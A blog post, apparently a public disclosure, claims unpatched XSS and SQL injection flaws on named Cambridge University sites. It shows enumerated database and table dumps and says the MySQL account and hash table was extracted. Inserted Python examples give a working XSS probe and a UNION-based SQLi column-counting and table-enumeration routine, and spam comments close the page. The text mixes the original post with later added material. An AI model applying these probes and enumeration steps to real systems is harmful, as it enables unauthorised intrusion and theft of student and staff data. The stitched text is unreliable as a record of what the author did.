Cambridge University and their glaring vulnerabilities they refuse to patch.

About a month ago I decided to audit Cambridge University. I was hoping to find some web application vulnerabilities which I could then report to get a bounty of some kind. I did a very basic audit, testing for Cross-Site Scripting (XSS), Local File Inclusion (LFI) and some other vulnerabilities such as SQL Injection (SQLi). What I discovered at such a reputable university is alarming, and the fact that they won't even respond to emails clearly implies they do not care whatsoever.

The first page I tested for XSS was their library page at http://www.lib.cam.ac.uk/

Yes, you guessed it. Vulnerable.

PoC: [screenshot not included in this copy]

The second page I tested was http://webapps.fitzmuseum.cam.ac.uk

…and of course XSS yet again

Here’s my openbugbounty submission report: https://www.openbugbounty.org/reports/280729/

PoC: [screenshot not included in this copy]

I also looked for other things like their robots.txt file which can be found at http://www.lib.cam.ac.uk/robots.txt

I decided to stop looking for XSS on Cambridge as the site is just littered with them. Their impact is also limited, as they are non-persistent (reflected): a victim has to be lured into opening a crafted link before anything runs. That doesn't mean they shouldn't be patched.
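As an added example (not part of the original post, and not the author's own tooling), here is the kind of reflected-XSS check the audit above describes, written in Python. The three handler functions are constructed stand-ins for a search page, not Cambridge's code: one concatenates the query parameter straight into HTML, one escapes it for the HTML context, one never echoes it. The probe sends a unique canary wrapped in the characters an injected tag needs and reports whether they come back intact, entity-encoded, or not at all. The base URL and parameter name in probe_url are hypothetical and nothing is sent over the network.

```python
import html
import secrets
from urllib.parse import urlencode

# Constructed stand-ins for a server-side search page (not the audited site's code).
# Each takes the raw value of a query parameter and returns the HTML it would send.
def render_search_vulnerable(q: str) -> str:
    """Reflects the parameter straight into an HTML text context: reflected XSS."""
    return "<html><body><h1>Results for " + q + "</h1></body></html>"

def render_search_safe(q: str) -> str:
    """Hardened: HTML-escape for the context the value lands in before concatenating."""
    return "<html><body><h1>Results for " + html.escape(q, quote=True) + "</h1></body></html>"

def render_static(q: str) -> str:
    """Does not echo the parameter at all."""
    return "<html><body><h1>Results</h1></body></html>"

def make_canary() -> str:
    """A unique marker wrapped in the metacharacters an injected tag needs.
    Unique per request so a cached or unrelated page cannot give a false match."""
    return '"><xss' + secrets.token_hex(4) + '>'

def classify_reflection(body: str, canary: str) -> str:
    """'raw'     : canary present with " < > untouched -> XSS candidate, verify by hand
       'encoded' : canary present but the metacharacters were entity-encoded
       'absent'  : the parameter is not reflected on this page"""
    if canary in body:
        return "raw"
    full = html.escape(canary, quote=True)                      # &quot;&gt;&lt;xss..&gt;
    partial = canary.replace("<", "&lt;").replace(">", "&gt;")  # quotes left alone
    if full in body or partial in body:
        return "encoded"
    return "absent"

def probe(handler) -> str:
    """Run one fresh canary through a handler and classify the result."""
    canary = make_canary()
    return classify_reflection(handler(canary), canary)

def probe_url(base: str, param: str, canary: str) -> str:
    """What the same probe looks like as a GET request against a live page
    (hypothetical base URL and parameter name; nothing is sent from here)."""
    return base + "?" + urlencode({param: canary})

if __name__ == "__main__":
    for name, h in [("vulnerable", render_search_vulnerable),
                    ("safe", render_search_safe), ("static", render_static)]:
        print(f"{name:10s} -> {probe(h)}")
    print(probe_url("http://example.invalid/search", "q", make_canary()))
```

A result of "encoded" is not automatically safe: the partial check above accepts a page that encodes angle brackets but leaves the double quote alone, which is still exploitable when the value lands inside an attribute rather than in text. Treat anything but "absent" as worth a manual look at the surrounding context.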

So to sum up the rest of this post…

 

OK... now let's get straight to the more serious vulnerabilities, which they most definitely should have patched by now, but unfortunately they can't even respond to emails. As stated previously, they also don't seem to care at all.

I will, however, post proof that these vulnerabilities can be exploited and that they are very SERIOUS.

The first SQLi vulnerability appears to be error based:

From testing, the vulnerable query returns 20 columns:

The attacker can now find which of those columns are displayed in the page (the usable columns), then go on to enumerate the database names and tables and extract the data from them.
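An added example (not from the original post) of the column-counting and schema-enumeration steps described above, in Python against an in-memory SQLite database that stands in for the target's MySQL. The schema and rows are constructed (four columns rather than the twenty found above, and no real data). MySQL reports the over-range ORDER BY as "Unknown column 'N' in 'order clause'" and its schema is read through information_schema.tables rather than sqlite_master, but the probing technique is identical. The parameterised lookup beside the vulnerable one shows why the same payloads do nothing against a bound parameter.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed sample schema standing in for the target database (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE images (id INTEGER, title TEXT, path TEXT, owner TEXT);
        INSERT INTO images VALUES (1, 'Old Schools', '/img/1.jpg', 'alice'),
                                  (2, 'The Backs',   '/img/2.jpg', 'bob');
        CREATE TABLE users (id INTEGER, username TEXT, pwhash TEXT);
        INSERT INTO users VALUES (1, 'admin', 'not-a-real-hash');
    """)
    return conn

def lookup_vulnerable(conn, image_id: str):
    """Vulnerable: the request parameter is pasted into the SQL text."""
    sql = "SELECT id, title, path, owner FROM images WHERE id = " + image_id
    return conn.execute(sql).fetchall()

def lookup_safe(conn, image_id: str):
    """Hardened: a bound parameter is always data, never SQL syntax."""
    sql = "SELECT id, title, path, owner FROM images WHERE id = ?"
    return conn.execute(sql, (image_id,)).fetchall()

def count_columns(conn, lookup, max_cols=64):
    """Error-based column counting: 'ORDER BY n' succeeds while n is within the
    column count and raises once it is not. Returns None if no n ever errors,
    which is what a non-injectable parameter looks like to this probe."""
    found = None
    for n in range(1, max_cols + 1):
        try:
            lookup(conn, f"1 ORDER BY {n}")
        except sqlite3.OperationalError:
            return found
        found = n
    return None

def visible_columns(conn, lookup, ncols):
    """UNION in one distinct marker per column and see which positions come back.
    On a real page only the displayed positions are usable for extraction."""
    markers = ", ".join(f"'col{i}'" for i in range(1, ncols + 1))
    rows = lookup(conn, f"-1 UNION SELECT {markers}")
    return [i for i in range(1, ncols + 1) if any(f"col{i}" in row for row in rows)]

def enumerate_tables(conn, lookup, ncols, col):
    """Pull table names out through one visible column. MySQL would read
    information_schema.tables; SQLite keeps the equivalent in sqlite_master."""
    fields = ["NULL"] * ncols
    fields[col - 1] = "name"
    payload = (f"-1 UNION SELECT {', '.join(fields)} "
               "FROM sqlite_master WHERE type = 'table'")
    return sorted(row[col - 1] for row in lookup(conn, payload))

if __name__ == "__main__":
    db = make_db()
    n = count_columns(db, lookup_vulnerable)
    print("columns:", n, "visible:", visible_columns(db, lookup_vulnerable, n))
    print("tables:", enumerate_tables(db, lookup_vulnerable, n, 2))
    print("same probe against the bound parameter:", count_columns(db, lookup_safe))
```

The fix is the one-line difference between the two lookup functions: with a placeholder, the string "1 ORDER BY 5" is compared against the id column as a value and simply matches nothing, so neither the error nor the UNION row ever appears.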

 

web server operating system: Linux Debian 8.0 (jessie)
Apache 2.4.10
MySQL >= 5.0
databases[6]
[*] generate
[*] images
[*] information_schema
[*] mysql
[*] performance_schema
[*] test

 

Database: mysql
[24 tables]
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |

And here is the data extracted from the user table in the [mysql] database, which holds the MySQL account names, the hosts they may connect from and their password hashes. I decided to format it using Excel:


Data can be extracted from any one of those databases. If a malicious attacker were to extract data from other tables, they could obtain private student and staff information, and even private research material stored in the MySQL database.

I will now move on to the second SQLi vulnerability. This one is on the admin sub-domain of Cambridge; it has one database and over 400 tables.

Database: *
[424 tables]
| ActiveDataFeed |
| Admin |
| Affichage1Affichage1edu |
| Ansicht1 |
| Apply |
| Auftrag |
| BOOK_AUTHORS |
| BUYER |
| Bestellungen |
| CLIENTES |
| CUSTOMER |
| Campus |
| Channel_Data |
| Coefficients |
| Compagnie |
| DC_Data |
| DSProp_table |
| DWE_Subscriptions |
| DWE_Task_Attributes |
| DWE_Workflow_Documents |
| D_Abbreviation |
| D_Format |
| D_PR_EVENTOS |
| Economy |
| Editor |
| Employees |
| Etudiant |
| Film |
| FindCriteria |
| GDirectedRoute |
| Genre |
| Gruppen |
| LT_CLASSE_FORO |
| LT_CUSTOM3 |
| LT_EVENTO |
| LT_NATUREZA |
| LT_SERIE |
| Languages |
| LastName |
| Lieux |
| M_CADASTRO_GERAL |
| M_ESQUEMA_PERMISSAO |
| M_RELATORIOS |
| NUEVOS |
| OperationStatus |
| PERSONAL |
| PREFIX_order_return_state_lang |
| PREFIX_tab |
| PREFIX_timezone |
| PRODUTO |
| PROFESORES |
| PUBLISHER |
| PZ |
| Pilot |
| Propdesc_table |
| Publication |
| QRTZ_JOB_DETAILS |
| RATING |
| ROLE |
| SGA_XPLAN_TPL_DBA_IND_COLUMNS |
| SGA_XPLAN_TPL_DBA_TABLES |
| SIGNON |
| S_LOG |
| SchemaInfo |
| Slot |
| SpecificationLink |
| Standorte |
| Station_Comment |
| Student |
| Studenten |
| SurveyRespondent |
| TBLUSERS |
| THOT_SUB_MENU |
| Tagebuch |
| ThumbnailKeyword |
| Titres |
| TotalMembers |
| Umfrage |
| VenuesNew |
| Volume |
| X_3945 |
| USER |
| keys |
| language |
| translation |
| about |
| account_level |
| accounts |
| actualites |
| add_irm |
| adminpwd |
| adminuser |
| agence |
| aggtest |
| alarms |
| aliastype |
| alike |
| app_user |
| applications |
| area |
| art |
| artist |
| attribut |
| audio |
| auto_id_tests |
| autore |
| autorizacaonfe |
| banners |
| based |
| be_users |
| been |
| binn_articles |
| binn_catalog_fields |
| binn_catprops |
| binn_catrights |
| binn_form39 |
| binn_imagelib_templ |
| binn_user_rights |
| bkp_ResourceFolder |
| categorylinks |
| cdb_access |
| cdb_adminactions |
| cdb_adminsessions |
| cdb_debates |
| cdb_forumrecommend |
| cdb_imagetypes |
| cdb_paymentlog |
| cdb_pluginvars |
| cdv_map_feature |
| cdv_passport_group |
| chat_users |
| cities |
| clients |
| clubconfig |
| cmRole |
| cmsusers |
| coherently |
| compositions |
| comune |
| conf |
| config |
| connectorswitches |
| content |
| continent |
| country |
| cpg132_users |
| cpg_config |
| credits |
| css_file |
| customers_basket |
| dbstudents |
| dbuser |
| department |
| dept_location |
| detrimental |
| developers |
| diary |
| dictionary |
| div_annotation_type |
| div_locality |
| div_poly_type |
| dpt_trans |
| dtb_bat_relate_products |
| dtb_blocposition |
| dtb_customer_reading |
| dtb_deliv |
| dtb_recommend_products |
| duvida |
| e107_user |
| employer |
| emu_services |
| eventi |
| ew_temi |
| extremes |
| ezin_authors |
| f_attributedependencies |
| f_options |
| f_spatialcontextgroup |
| festplatte |
| fiscal |
| foreigntest |
| form_data |
| forum_user_stat |
| fusion_user_groups |
| ganatlebe_ge |
| geo_Island |
| geraet |
| gesuche |
| glmm |
| grau_escolaridade |
| grind |
| groupe |
| gws_client |
| has |
| hersteller |
| history |
| honorsinfo |
| ibf_members_converge |
| imagelinks |
| images |
| interactions |
| interwiki |
| intranet_users |
| invite |
| isMember |
| itemnotafiscal |
| items_template |
| itens |
| jforum_smilies |
| jiveExtComponentConf |
| jiveGroupUser |
| jiveRoster |
| jiveRosterGroups |
| jiveUserProp |
| jiveVersion |
| jobs |
| jos_estadisticas |
| jos_jce_groups |
| jos_jce_plugins |
| jos_languages |
| jos_messages_cfg |
| jos_modules_menu |
| jos_moschat_users |
| jos_poll_data |
| jos_templates_menu |
| jos_vm_auth_group |
| jos_vm_cart |
| jos_vm_category_xref |
| jos_vm_currency |
| jos_vm_product_category_xref |
| jos_vm_product_type_parameter |
| jurosstrategy |
| kategorien |
| kauf_artikel |
| kpro_adminlogs |
| lending |
| liens |
| line_items_seq |
| liste_domaines |
| livre |
| loan |
| located |
| login_user |
| mailaddresses |
| manage |
| mapdata |
| marital_status |
| math |
| mein_doc_h |
| membership |
| mima |
| minutes |
| mitarbeiter |
| mlattach |
| modulerubriquephoto |
| monitoringi_ge |
| music_association |
| mymps_advertisement |
| mymps_member_album |
| ndash |
| networking |
| newsletter_recipients |
| nickel |
| nomarski |
| noncommercial |
| notafiscal_deducao |
| notizen |
| nuke_authors |
| nuke_autonews |
| nuke_bbgroups |
| nuke_bbtopics_watch |
| nuke_bbuser_group |
| nuke_bbvote_voters |
| nuke_config |
| nuke_counter |
| nuke_downloads_categories |
| nuke_downloads_downloads |
| nuke_downloads_modrequest |
| nuke_downloads_newdownload |
| nuke_links_modrequest |
| nuke_main |
| nuke_poll_desc |
| nuke_pollcomments |
| nuke_reviews_comments |
| nuke_session |
| nuke_stats_month |
| nuke_subscriptions |
| nulltest |
| obb_profiles |
| oil_bfsurvey_pro |
| oil_bfsurveypro_34 |
| oil_bfsurveypro_35 |
| oil_biolmed_entity_types |
| oil_dbcache |
| oil_modules_menu |
| oil_newsfeeds |
| oil_phocadownload |
| oil_phocadownload_categories |
| oil_phocagallery_votes |
| oil_rokdownloads |
| orders |
| organization |
| osc_manufacturers |
| osc_products_attributes |
| otherwise |
| package |
| pagelinks |
| paper |
| participate |
| periods |
| phorum_user |
| phpbb_banlist |
| phpbb_topics_watch |
| phpbb_vote_results |
| platforms |
| pma_relation |
| pma_table_coords |
| pma_table_info |
| polarised |
| poll_user |
| precipitation |
| preferences |
| presence |
| product |
| produtos |
| project_user_xref |
| property |
| province |
| pw_adminset |
| pw_forums |
| pw_hack |
| pw_wordfb |
| pwds |
| qrtz_simple_triggers |
| radacct |
| reciprocal_links |
| reciprocal_partnersites |
| registered |
| report |
| reserve |
| river |
| root |
| roots |
| rss |
| rss_subscription |
| sampleData |
| schema_info |
| seen |
| sf_guard_remember_key |
| singup |
| slserver |
| spip_caches |
| spip_meta |
| spip_mots |
| spip_versions |
| spip_versions_fragments |
| spip_visites |
| spip_visites_articles |
| stable |
| state |
| store3 |
| ststaff |
| stuser |
| subject |
| subscribe |
| sysadmin |
| system |
| t_snap |
| tables_priv |
| tb_nguoidungs |
| tblLayouts |
| tbl_login |
| tbl_works_categories |
| tblblogroles |
| tbllogins |
| tbuseraccounts |
| team |
| test_user |
| tester |
| three |
| time_zone_leap_second |
| transactions |
| trigger_depends |
| turizmi_ge |
| tusers |
| tx_tcdirectmail_clicklinks |
| u_n |
| un |
| uname |
| uniquetest |
| user_groups |
| user_nm |
| user_un |
| user_uname |
| user_usern |
| useradmin |
| userid |
| usern |
| usr_pw |
| vbulletin_session |
| vcd_CoversAllowedOnMediatypes |
| vcd_PornStudios |
| vcd_Pornstars |
| vcd_VcdToPornstars |
| vcd_VcdToSources |
| vendor |
| veranstalter |
| vertex |
| videos |
| vrls_listings |
| vrls_partners |
| vrls_xref_listing_type |
| vrls_xref_state_province |
| ways |
| webcal_config |
| webcal_entry_ext_user |
| win |
| wp_pod_types |
| wp_usermeta |
| writes |
| x_admin |
| xb0c |
| zo_kontakt_stelle |
| zones |

A note on that list: the database name is shown as * and the table names include plain English words such as has, been, otherwise, seen, three and coherently, mixed with the schemas of dozens of unrelated applications (Joomla jos_, PHP-Nuke nuke_, WordPress wp_, phpBB phpbb_, SPIP spip_). That looks like the output of a dictionary-based table-name guess, the fallback used when the schema cannot be read from information_schema, rather than a listing of one application's real schema, so each of those entries should be confirmed individually (for example by selecting a row from it) before it is counted.

I don't really want to drag this on, so I will move straight on to the last SQLi vulnerability:

And yes, again, this can be exploited.

Database: information_schema
[40 tables]
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |

So the message here is simple: get your sh*t patched and stop compromising student and staff data!

I wrote this up pretty quickly and decided to include only database and table names, as I don't want to compromise Cambridge any more than they already are.

Hope you enjoyed this little writeup :)

20 Replies to “Cambridge University and their glaring vulnerabilities they refuse to patch.”

  1. I think what you published was very logical.

    But, consider this, what if you were to create an awesome headline?
    I ain't saying your information is not good, but suppose you added a
    headline that grabbed a person's attention? I mean "Cambridge University and their
    glaring vulnerabilities they refuse to patch." is a little
    plain. You might glance at Yahoo's home page and see how they create
    article headlines to grab viewers to click.
    You might try adding a video or a pic or two to get people excited about everything you've got to say.
    Just my opinion, it might make your posts a little bit more interesting.

  2. I know this is off topic but I'm looking into starting
    my own weblog and was curious what all is required to get setup?
    I’m assuming having a blog like yours would cost a pretty penny?
    I’m not very internet savvy so I’m not 100% positive.

    Any recommendations or advice would be greatly appreciated.
    Thanks

  3. Greetings from Ohio! I’m bored to death at work
    so I decided to check out your blog on my iphone during lunch break.
    I love the info you present here and can’t wait to take a look when I get home.
    I’m shocked at how quick your blog loaded on my cell
    phone .. I’m not even using WIFI, just 3G
    .. Anyhow, awesome blog!

  4. I like the helpful info you provide in your articles.
    I will bookmark your weblog and check again here regularly.
    I’m quite certain I will learn a lot of new stuff right
    here! Best of luck for the next!

  5. Wonderful goods from you, man. I've understood your stuff previously and you are just extremely fantastic.
    I actually like what you have acquired here, certainly like what you’re
    stating and the way in which you say it. You make it entertaining and you still
    take care to keep it smart. I can't wait to read much more from you.
    This is really a wonderful site.

  6. Please let me know if you're looking for an article author for your weblog.
    You have some really great articles and I
    think I would be a good asset. If you ever want to
    take some of the load off, I’d really like to write
    some articles for your blog in exchange for a link back to mine.
    Please blast me an email if interested. Cheers!

  7. I'm not sure where you're getting your information, but great topic. I need to spend some time learning more or understanding more. Thanks for the magnificent info, I was looking for this info for my mission.
